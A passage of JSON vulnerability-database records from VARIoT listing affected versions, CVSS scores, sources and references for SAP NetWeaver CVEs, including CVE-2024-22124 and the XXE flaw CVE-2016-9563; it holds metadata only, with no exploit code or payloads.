"id": "JVNDB-2013-005193"
},
{
"date": "2013-11-20T14:12:30.913000",
"db": "NVD",
"id": "CVE-2013-6814"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-285"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14601"
},
{
"date": "2013-11-21T00:37:00",
"db": "BID",
"id": "63783"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005193"
},
{
"date": "2018-12-10T19:29:01.170000",
"db": "NVD",
"id": "CVE-2013-6814"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-285"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-285"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver SAP Portal URI Redirection Vulnerability",
"sources": [
{
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14601"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input validation",
"sources": [
{
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-285"
}
],
"trust": 0.8
}
}
var-202401-1823
Vulnerability from variot
Under certain conditions, Internet Communication Manager (ICM) or SAP Web Dispatcher - versions KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT, WEBDISP 7.53, WEBDISP 7.54, could allow an attacker to access information which would otherwise be restricted causing high impact on confidentiality. SAP of SAP NetWeaver Exists in unspecified vulnerabilities.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202401-1823",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64nuc_7.22"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "kernel_7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64uc_7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "webdisp_7.54"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64nuc_7.22ext"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64uc_7.22ext"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "webdisp_7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "kernel_7.54"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "webdisp_7.22ext"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "kernel_7.22"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "kernel 7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "krnl64nuc 7.22ext"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "webdisp 7.22ext"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "krnl64nuc 7.22"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "webdisp 7.54"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "kernel 7.22"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "krnl64uc 7.22ext"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "webdisp 7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "kernel 7.54"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "krnl64uc 7.53"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-001591"
},
{
"db": "NVD",
"id": "CVE-2024-22124"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:krnl64nuc_7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:kernel_7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:krnl64uc_7.22ext:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:krnl64uc_7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:krnl64nuc_7.22ext:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:webdisp_7.22ext:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:webdisp_7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:webdisp_7.54:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:kernel_7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:kernel_7.54:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2024-22124"
}
]
},
"cve": "CVE-2024-22124",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "cna@sap.com",
"availabilityImpact": "NONE",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.5,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2024-22124",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2024-22124",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "cna@sap.com",
"id": "CVE-2024-22124",
"trust": 1.0,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-001591"
},
{
"db": "NVD",
"id": "CVE-2024-22124"
},
{
"db": "NVD",
"id": "CVE-2024-22124"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Under certain conditions,\u00a0Internet Communication Manager (ICM) or\u00a0SAP Web Dispatcher - versions KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT, WEBDISP 7.53, WEBDISP 7.54, could\u00a0allow an attacker to access information which would otherwise be restricted causing high impact on confidentiality. SAP of SAP NetWeaver Exists in unspecified vulnerabilities.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-22124"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-001591"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-22124",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-001591",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-001591"
},
{
"db": "NVD",
"id": "CVE-2024-22124"
}
]
},
"id": "VAR-202401-1823",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2024-02-06T23:00:38.703000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "Lack of information (CWE-noinfo) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-001591"
},
{
"db": "NVD",
"id": "CVE-2024-22124"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 1.0,
"url": "https://me.sap.com/notes/3392626"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-22124"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-001591"
},
{
"db": "NVD",
"id": "CVE-2024-22124"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-001591"
},
{
"db": "NVD",
"id": "CVE-2024-22124"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-02-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-001591"
},
{
"date": "2024-01-09T02:15:46.207000",
"db": "NVD",
"id": "CVE-2024-22124"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-02-05T07:47:00",
"db": "JVNDB",
"id": "JVNDB-2024-001591"
},
{
"date": "2024-01-22T19:17:13.050000",
"db": "NVD",
"id": "CVE-2024-22124"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0 of \u00a0SAP\u00a0NetWeaver\u00a0 Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-001591"
}
],
"trust": 0.8
}
}
var-201611-0385
Vulnerability from variot
BC-BMT-BPM-DSK in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to conduct XML External Entity (XXE) attacks via the sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn URI, aka SAP Security Note 2296909. Vendors have confirmed this vulnerability SAP Security Note 2296909 It is released as. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. An attacker can exploit this issue to cause a denial of service condition
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201611-0385",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "92419"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"db": "NVD",
"id": "CVE-2016-9563"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-9563"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "92419"
}
],
"trust": 0.3
},
"cve": "CVE-2016-9563",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-9563",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2016-9563",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2016-9563",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-9563",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201611-535",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-9563",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-9563"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"db": "NVD",
"id": "CVE-2016-9563"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "BC-BMT-BPM-DSK in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to conduct XML External Entity (XXE) attacks via the sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn URI, aka SAP Security Note 2296909. Vendors have confirmed this vulnerability SAP Security Note 2296909 It is released as. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. \nAn attacker can exploit this issue to cause a denial of service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-9563"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"db": "BID",
"id": "92419"
},
{
"db": "VULMON",
"id": "CVE-2016-9563"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-9563",
"trust": 2.8
},
{
"db": "BID",
"id": "92419",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005937",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201611-535",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2016-9563",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-9563"
},
{
"db": "BID",
"id": "92419"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"db": "NVD",
"id": "CVE-2016-9563"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
]
},
"id": "VAR-201611-0385",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-26T00:00:50.641000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Cyber Threat Intelligence report - August 2016 (2296909)",
"trust": 0.8,
"url": "https://blogs.sap.com/2016/08/10/sap-cyber-threat-intelligence-report-august-2016/"
},
{
"title": "SAP NetWeaver Application Server Java Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=65870"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2021/04/06/sap_patch_attacks/"
},
{
"title": "Known Exploited Vulnerabilities Detector",
"trust": 0.1,
"url": "https://github.com/ostorlab/kev "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-9563"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-611",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"db": "NVD",
"id": "CVE-2016-9563"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/92419"
},
{
"trust": 1.7,
"url": "https://erpscan.io/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/"
},
{
"trust": 1.7,
"url": "https://launchpad.support.sap.com/#/notes/2296909"
},
{
"trust": 1.1,
"url": "https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-9563"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-9563"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2296909"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/611.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.theregister.co.uk/2021/04/06/sap_patch_attacks/"
},
{
"trust": 0.1,
"url": "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-9563"
},
{
"db": "BID",
"id": "92419"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"db": "NVD",
"id": "CVE-2016-9563"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-9563"
},
{
"db": "BID",
"id": "92419"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"db": "NVD",
"id": "CVE-2016-9563"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
